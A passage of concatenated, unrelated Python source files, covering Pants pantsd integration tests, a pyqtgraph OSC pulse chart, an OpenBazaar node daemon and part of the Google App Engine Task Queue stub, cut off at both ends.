list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""Tests that the --concurrent flag overrides the --enable-pantsd flag, because we don't
allow concurrent runs under pantsd."""
config = {"GLOBAL": {"concurrent": True, "enable_pantsd": True}}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(["goals"], workdir=workdir, config=config)
self.assert_success(pants_run)
# TODO migrate to pathlib when we cut 1.18.x
pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log")
self.assertFalse(os.path.exists(pantsd_log_location))
def test_unhandled_exceptions_only_log_exceptions_once(self):
"""Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't
manifest as a PantsRunFinishedWithFailureException.
That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception.
This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597.
"""
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(["run", "testprojects/src/python/bad_requirements:use_badreq"])
checker.assert_running()
self.assert_failure(result)
# Assert that the desired exception has been triggered once.
self.assertIn(
"""Exception message: Could not satisfy all requirements for badreq==99.99.99:\n badreq==99.99.99""",
result.stderr_data,
)
# Assert that it has only been triggered once.
self.assertNotIn(
"During handling of the above exception, another exception occurred:",
result.stderr_data,
)
self.assertNotIn(
"pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1",
result.stderr_data,
)
def test_inner_runs_dont_deadlock(self):
"""Create a pantsd run that calls testprojects/src/python/nested_runs with the appropriate
bootstrap options to avoid restarting pantsd.
Regression test for issue https://github.com/pantsbuild/pants/issues/7881
When a run under pantsd calls pants with pantsd inside it, the inner run will time out
waiting for the outer run to end.
NB: testprojects/src/python/nested_runs assumes that the pants.toml file is in ${workdir}/pants.toml
"""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": 1,}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
result = pantsd_run(
["run", "testprojects/src/python/nested_runs", "--", workdir], expected_runs=2
)
checker.assert_started()
self.assert_success(result)
self.assertNotIn("Another pants invocation is running", result.stderr_data)
|
gl-pulse-chart.py
|
# import asyncio
from collections import deque
import sys
import time
import threading
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
from pythonosc.dispatcher import Dispatcher
from pythonosc import osc_server
trace = None
X = np.linspace(0, 100, num=100)
Y = np.sin(X*10)
Z = np.linspace(0, 0, num=100)
pts = np.vstack((X, Y, Z)).T
BUF_LEN = 100
buffer = deque([0]*BUF_LEN, BUF_LEN)
def update():
print('update')
global trace
pts[:, 1] = np.sin(X + 2*time.time())
trace.setData(pos=pts, color=(0,1,0,1), width=8)
def main():
global trace
app = QtGui.QApplication(sys.argv)
w = gl.GLViewWidget()
w.opts['distance'] = 10
w.setWindowTitle('pyqtgraph example: GLLinePlotItem')
w.setGeometry(0, 0, 800, 600)
w.resize(800, 600)
pg.setConfigOptions(antialias=True)
trace = gl.GLLinePlotItem(
pos=pts,
color=(0,1,0,1),
width=3,
antialias=True
)
w.addItem(trace)
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(10)
QtGui.QApplication.instance().exec_()
def pulse_handler(addr, val):
buffer.append(val)
print(val)
# plot()
def osc_boot_main():
dispatcher = Dispatcher()
dispatcher.map("/pulse", pulse_handler)
server = osc_server.ThreadingOSCUDPServer( ('0.0.0.0', 37339), dispatcher)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
if __name__ == '__main__':
osc_boot_main()
main()
|
openbazaar_daemon.py
|
import argparse
import tornado.web
from zmq.eventloop import ioloop
ioloop.install()
from transport import CryptoTransportLayer
from db_store import Obdb
from market import Market
from ws import WebSocketHandler
import logging
import signal
from threading import Thread
from twisted.internet import reactor
from util import open_default_webbrowser
from network_util import get_random_free_tcp_port
import upnp
import os
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.redirect("/html/index.html")
class OpenBazaarStaticHandler(tornado.web.StaticFileHandler):
def set_extra_headers(self, path):
self.set_header("X-Frame-Options", "DENY")
self.set_header("X-Content-Type-Options", "nosniff")
class MarketApplication(tornado.web.Application):
def __init__(self, market_ip, market_port, market_id=1,
bm_user=None, bm_pass=None, bm_port=None, seed_peers=None,
seed_mode=0, dev_mode=False, db_path='db/ob.db', disable_sqlite_crypt=False, disable_ip_update=False):
if seed_peers is None:
seed_peers = []
db = Obdb(db_path, disable_sqlite_crypt)
self.transport = CryptoTransportLayer(market_ip,
market_port,
market_id,
db,
bm_user,
bm_pass,
bm_port,
seed_mode,
dev_mode,
disable_ip_update)
self.market = Market(self.transport, db)
# UNUSED
# def post_joined():
# self.transport.dht._refreshNode()
# self.market.republish_contracts()
peers = seed_peers if seed_mode == 0 else []
self.transport.join_network(peers)
Thread(target=reactor.run, args=(False,)).start()
handlers = [
(r"/", MainHandler),
(r"/main", MainHandler),
(r"/html/(.*)", OpenBazaarStaticHandler, {'path': './html'}),
(r"/ws", WebSocketHandler,
dict(transport=self.transport, market_application=self, db=db))
]
# TODO: Move debug settings to configuration location
settings = dict(debug=True)
tornado.web.Application.__init__(self, handlers, **settings)
def get_transport(self):
return self.transport
def setup_upnp_port_mappings(self, http_port, p2p_port):
upnp.PortMapper.DEBUG = False
print "Setting up UPnP Port Map Entry..."
# TODO: Add some setting whether or not to use UPnP
# if Settings.get(Settings.USE_UPNP_PORT_MAPPINGS):
self.upnp_mapper = upnp.PortMapper()
# TODO: Add some setting whether or not to clean all previous port
# mappings left behind by us
# if Settings.get(Settings.CLEAN_UPNP_PORT_MAPPINGS_ON_START):
# upnp_mapper.cleanMyMappings()
# for now let's always clean mappings every time.
self.upnp_mapper.clean_my_mappings(p2p_port)
# result_http_port_mapping = self.upnp_mapper.add_port_mapping(http_port,
# http_port)
# print ("UPnP HTTP Port Map configuration done (%s -> %s) => %s" %
# (str(http_port), str(http_port), str(result_http_port_mapping)))
result_tcp_p2p_mapping = self.upnp_mapper.add_port_mapping(p2p_port,
p2p_port)
print ("UPnP TCP P2P Port Map configuration done (%s -> %s) => %s" %
(str(p2p_port), str(p2p_port), str(result_tcp_p2p_mapping)))
result_udp_p2p_mapping = self.upnp_mapper.add_port_mapping(p2p_port,
p2p_port,
'UDP')
print ("UPnP UDP P2P Port Map configuration done (%s -> %s) => %s" %
(str(p2p_port), str(p2p_port), str(result_udp_p2p_mapping)))
result = result_tcp_p2p_mapping and result_udp_p2p_mapping
if not result:
print "Warning: UPnP was not setup correctly. Try doing a port forward on %s and start the node again with -j" % p2p_port
return result
def cleanup_upnp_port_mapping(self):
try:
if self.upnp_mapper is not None:
print "Cleaning UPnP Port Mapping -> ", \
self.upnp_mapper.clean_my_mappings(self.transport.port)
except AttributeError:
print "[openbazaar] MarketApplication.clean_upnp_port_mapping() failed!"
def shutdown(self, x=None, y=None):
print "MarketApplication.shutdown!"
locallogger = logging.getLogger(
'[%s] %s' % (self.market.market_id, 'root')
)
locallogger.info("Received TERMINATE, exiting...")
# application.get_transport().broadcast_goodbye()
self.cleanup_upnp_port_mapping()
tornado.ioloop.IOLoop.instance().stop()
self.transport.shutdown()
os._exit(0)
def start_node(my_market_ip,
my_market_port,
http_ip,
http_port,
log_file,
market_id,
bm_user=None,
bm_pass=None,
bm_port=None,
seed_peers=None,
seed_mode=0,
dev_mode=False,
log_level=None,
database='db/ob.db',
disable_upnp=False,
disable_open_browser=False,
disable_sqlite_crypt=False,
disable_ip_update=False):
if seed_peers is None:
seed_peers = []
try:
logging.basicConfig(
level=int(log_level),
format=u'%(asctime)s - %(name)s - %(levelname)s - %(message)s',
filename=log_file
)
logging._defaultFormatter = logging.Formatter(u'%(message)s')
locallogger = logging.getLogger('[%s] %s' % (market_id, 'root'))
handler = logging.handlers.RotatingFileHandler(
log_file,
encoding='utf-8',
maxBytes=50000000,
backupCount=0
)
locallogger.addHandler(handler)
except Exception as e:
print "Could not setup logger, continuing: ", e.message
application = MarketApplication(my_market_ip,
my_market_port,
market_id,
bm_user,
bm_pass,
bm_port,
seed_peers,
seed_mode,
dev_mode,
database,
disable_sqlite_crypt,
disable_ip_update)
error = True
p2p_port = my_market_port
if http_port == -1:
http_port = get_random_free_tcp_port(8889, 8988)
while error:
try:
application.listen(http_port, http_ip)
error = False
except:
http_port += 1
if not disable_upnp:
application.setup_upnp_port_mappings(http_port, p2p_port)
else:
print "Disabling upnp setup"
locallogger.info("Started OpenBazaar Web App at http://%s:%s" %
(http_ip, http_port))
print "Started OpenBazaar Web App at http://%s:%s" % (http_ip, http_port)
print "Use ./stop.sh to stop"
if not disable_open_browser:
open_default_webbrowser('http://%s:%s' % (http_ip, http_port))
try:
signal.signal(signal.SIGTERM, application.shutdown)
except ValueError:
# not the main thread
pass
if not tornado.ioloop.IOLoop.instance():
ioloop.install()
else:
try:
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("my_market_ip")
parser.add_argument("-p", "--my_market_port",
type=int, default=12345)
# default secure behavior is to keep HTTP port private
parser.add_argument("-k", "--http_ip", default="127.0.0.1")
parser.add_argument("-q", "--http_port", type=int, default=-1)
parser.add_argument("-l", "--log_file",
default='logs/production.log')
parser.add_argument("-u", "--market_id",
default=1)
parser.add_argument("-S", "--seed_peers",
nargs='*', default=[])
parser.add_argument("-s", "--seed_mode",
default=0)
parser.add_argument("-d", "--dev_mode",
action='store_true')
parser.add_argument("--database",
default='db/ob.db', help="Database filename")
parser.add_argument("--bmuser",
default='username', help="Bitmessage instance user")
parser.add_argument("--bmpass",
default='password', help="Bitmessage instance pass")
parser.add_argument("--bmport",
default='8442', help="Bitmessage instance RPC port")
parser.add_argument("--log_level",
default=10, help="Numeric value for logging level")
parser.add_argument("--disable_upnp",
action='store_true')
parser.add_argument("--disable_open_browser",
action='store_true',
default=False)
parser.add_argument("--disable_sqlite_crypt",
action='store_true',
default=False)
parser.add_argument("--disable-ip-update",
action='store_true',
default=False)
args = parser.parse_args()
start_node(args.my_market_ip,
args.my_market_port,
args.http_ip,
args.http_port,
args.log_file,
args.market_id,
args.bmuser,
args.bmpass,
args.bmport,
args.seed_peers,
args.seed_mode,
args.dev_mode,
args.log_level,
args.database,
args.disable_upnp,
args.disable_open_browser,
args.disable_sqlite_crypt,
args.disable_ip_update)
# Run this if executed directly
if __name__ == "__main__":
main()
|
taskqueue_stub.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import cgi
import datetime
import httplib
import logging
import os
import random
import socket
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskretrycount',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
A datetime.timedelta with the microseconds field not filled.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-Development-Payload', '1'))
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this queue is not based on a
queue.yaml file use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
Takes the ETA of the task in seconds since the epoch, the queue_name
and a task name. May be None if automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
if queue.Oldest():
queue_dict['oldest_task'] = _FormatEta(queue.Oldest())
queue_dict['eta_delta'] = _EtaDelta(queue.Oldest(), now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
raise TypeError, (
'_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl)
else:
queue = self._queues[queue_name]
queue.bucket_size = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues-new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
queue_name = request.queue_name()
response = self._ValidateQueueName(queue_name)
is_unknown_queue = (
response == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
if response != taskqueue_service_pb.TaskQueueServiceError.OK and (
not is_unknown_queue):
raise apiproxy_errors.ApplicationError(response)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
